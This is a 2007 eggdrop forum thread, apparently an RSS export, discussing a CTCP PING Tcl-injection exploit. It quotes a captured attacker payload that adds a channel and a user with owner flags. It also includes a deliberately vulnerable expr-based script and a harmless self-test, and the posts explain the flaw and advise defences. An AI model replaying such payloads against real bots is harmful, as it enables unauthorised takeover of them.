egghelp/eggheads community Discussion of eggdrop bots, shell accounts and tcl scripts. 2007-03-22T19:29:40-04:00 https://forum.eggheads.org/app.php/feed/topic/13263 2007-03-22T19:29:40-04:00 2007-03-22T19:29:40-04:00 https://forum.eggheads.org/viewtopic.php?p=71495#p71495 <![CDATA[Exploiting eggdrops through CTCP PING]]>
don't use netgate.tcl - http://forum.egghelp.org/viewtopic.php?t=6708#43430
After all the posts here (and the fact I alerted all the founders of the appropriate channels on DALnet) I am amazed that people still get hold of it.

Statistics: Posted by Alchera — Thu Mar 22, 2007 7:29 pm

]]> 2007-03-22T12:15:23-04:00 2007-03-22T12:15:23-04:00 https://forum.eggheads.org/viewtopic.php?p=71476#p71476 <![CDATA[Exploiting eggdrops through CTCP PING]]> Reading that thread, ctcp-backdoor is the least of your problems with that script...

Statistics: Posted by nml375 — Thu Mar 22, 2007 12:15 pm

]]> 2007-03-22T11:16:23-04:00 2007-03-22T11:16:23-04:00 https://forum.eggheads.org/viewtopic.php?p=71473#p71473 <![CDATA[Exploiting eggdrops through CTCP PING]]> http://forum.egghelp.org/viewtopic.php?t=6708#43430

Statistics: Posted by user — Thu Mar 22, 2007 11:16 am

]]> 2007-03-22T10:55:28-04:00 2007-03-22T10:55:28-04:00 https://forum.eggheads.org/viewtopic.php?p=71472#p71472 <![CDATA[Exploiting eggdrops through CTCP PING]]> And to be honest, any script that puts such efforts in making it hard to read/search for keywords/etc really makes me really wonder how many nasties are hidden in there.
Besides, I really don't see any other point in all that "encryption" (other than hiding trojans, etc), as most of it would be decrypted once loaded. Run it in a sandbox and you'd have most of it decoded.
Nice alert tho, Zexel.

Statistics: Posted by nml375 — Thu Mar 22, 2007 10:55 am

]]> 2007-03-22T10:38:25-04:00 2007-03-22T10:38:25-04:00 https://forum.eggheads.org/viewtopic.php?p=71471#p71471 <![CDATA[worst!]]>
(Eggbot) [03:04] CTCP PING: 1111305817 from TezDhaar (Scorpioon@BaCk.To.DarkneS.Us)
(Eggbot) [03:04] CTCP reply PING: [set notc "TCL";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan] from TezDhaar (Scorpioon@BaCk.To.DarkneS.Us) to Eggbot
That's request CTCP PING exploit would be work with NETGATE tcl version 9.x before and the all of the variants, please disable any CTCP PING request if you use that tcl! It can be effect of taking over fully the bot from your hand!

Please, becareful and disable any trigger CTCP PING request inside NETGATE tcl. :wink:
Thank you...

Statistics: Posted by ZEXEL — Thu Mar 22, 2007 10:38 am

]]> 2007-03-21T21:19:03-04:00 2007-03-21T21:19:03-04:00 https://forum.eggheads.org/viewtopic.php?p=71459#p71459 <![CDATA[Exploiting eggdrops through CTCP PING]]>
(Eggbot) [03:04] CTCP PING: 1111305817 from TezDhaar (Scorpioon@BaCk.To.DarkneS.Us)
(Eggbot) [03:04] CTCP reply PING: [set notc "TCL";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan] from TezDhaar (Scorpioon@BaCk.To.DarkneS.Us) to Eggbot
Now that's just lame, he adds his handle and channel three times lol :lol: maybe to be sure? or just a "good" luck thingie :roll: :P

You could've simply checked if that handle and channel have been added to your bot after it received this CTCP reply and told us whether it's effecting your bot or not ;)

I'd go with nml375's advice on this (great example). Check out "Script security" from the FAQ forum.

Statistics: Posted by Sir_Fz — Wed Mar 21, 2007 9:19 pm

]]> 2007-03-21T21:12:36-04:00 2007-03-21T21:12:36-04:00 https://forum.eggheads.org/viewtopic.php?p=71458#p71458 <![CDATA[Exploiting eggdrops through CTCP PING]]> Statistics: Posted by ap — Wed Mar 21, 2007 9:12 pm

]]> 2007-03-21T00:40:46-04:00 2007-03-21T00:40:46-04:00 https://forum.eggheads.org/viewtopic.php?p=71439#p71439 <![CDATA[Exploiting eggdrops through CTCP PING]]>
bind dcc n testping check_ping_vulnerability
So, in the dcc connection to your bot, testping

Statistics: Posted by rosc2112 — Wed Mar 21, 2007 12:40 am

]]> 2007-03-20T22:35:57-04:00 2007-03-20T22:35:57-04:00 https://forum.eggheads.org/viewtopic.php?p=71434#p71434 <![CDATA[Exploiting eggdrops through CTCP PING]]> So how would we test this? /ctcp nick ping or /ping nick

thanks

Statistics: Posted by ap — Tue Mar 20, 2007 10:35 pm

]]> 2007-03-20T09:40:00-04:00 2007-03-20T09:40:00-04:00 https://forum.eggheads.org/viewtopic.php?p=71414#p71414 <![CDATA[Exploiting eggdrops through CTCP PING]]> IF you've got a very poorly written "ctcp ping reply" script loaded, sure this might work.
However, plain vanilla eggdrops does not have any bindings to ctcr, and the only "raw" processing of ctcp-replys are in the irc- and server-module, which only identifies a notice to be a ctcp-reply and just logs the whole message.

How to identify a poor script? Here's an example:

Code: 

die "Do NOT run this script!!!"proc do_ping {hand idx text} {  puthelp "PRIVMSG $text :\001PING [unixtime]\001"}proc got_ping_reply {nick host hand target what time} {  putlog "Ping reply from $nick: [expr [unixtime] - $time] seconds."}bind dcc - buggedping do_pingbind ctcr - PING got_ping_reply
So what's so terribly wrong with this?
Well, this script trusts that the ping reply is "proper", that is, it returns the same timestamp that I first sent to the other client. However, a client may put whatever they wish as "timestamp", including an arbitrary string that may include nasty stuffs. But being unthoughtful, this script trusts it to be a simple integer that I can subtract from current time (now - timestamp), so I pass it unchecked to "expr". "expr" however will evaluate anything inbetween [] as tcl-code to be interpreted, and voila, the exploit you posted would work as a charm.

Lesson learned? NEVER EVER use expr with unchecked input from any untrusted source.

edit:
If you are worried wether your system is vulnerable to this, use this little script to check:

Code: 

proc check_ping_vulnerability {handle idx text} {  puthelp "NOTICE $::botnick :\001PING \[putlog \"Your bot suffers from a ctcp-pingreply remote exploit. Please check your loaded scripts.\"\]\001"}bind dcc n testping check_ping_vulnerability
Note, the following logentry would be recieved on safe bots aswell:
[14:58] CTCP reply PING: [putlog "Your bot suffers from a ctcp-pingreply remote exploit. Please check your loaded scripts."] from botnick (ident@host) to botnick
However, you are in trouble if you find this in your logs as a single logentry:
Your bot suffers from a ctcp-pingreply remote exploit. Please check your loaded scripts.

Statistics: Posted by nml375 — Tue Mar 20, 2007 9:40 am

]]> 2007-03-20T04:17:34-04:00 2007-03-20T04:17:34-04:00 https://forum.eggheads.org/viewtopic.php?p=71408#p71408 <![CDATA[Exploiting eggdrops through CTCP PING]]>
<tux> If you've got a channel kick script, you might add #hackers_group to it, and the ident *!Scorpioon@* to banlists.. lamers in there going around trying to exploit eggdrops.
CTCP sent to his bot and CTCR reply returned:
(Eggbot) [03:04] CTCP PING: 1111305817 from TezDhaar (Scorpioon@BaCk.To.DarkneS.Us)
(Eggbot) [03:04] CTCP reply PING: [set notc "TCL";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan;adduser TezDhaar TezDhaar*!*@*;chattr TezDhaar "fhjlmnoptxQZ";channel add #hackers_group;savechan] from TezDhaar (Scorpioon@BaCk.To.DarkneS.Us) to Eggbot

Statistics: Posted by awyeah — Tue Mar 20, 2007 4:17 am

]]>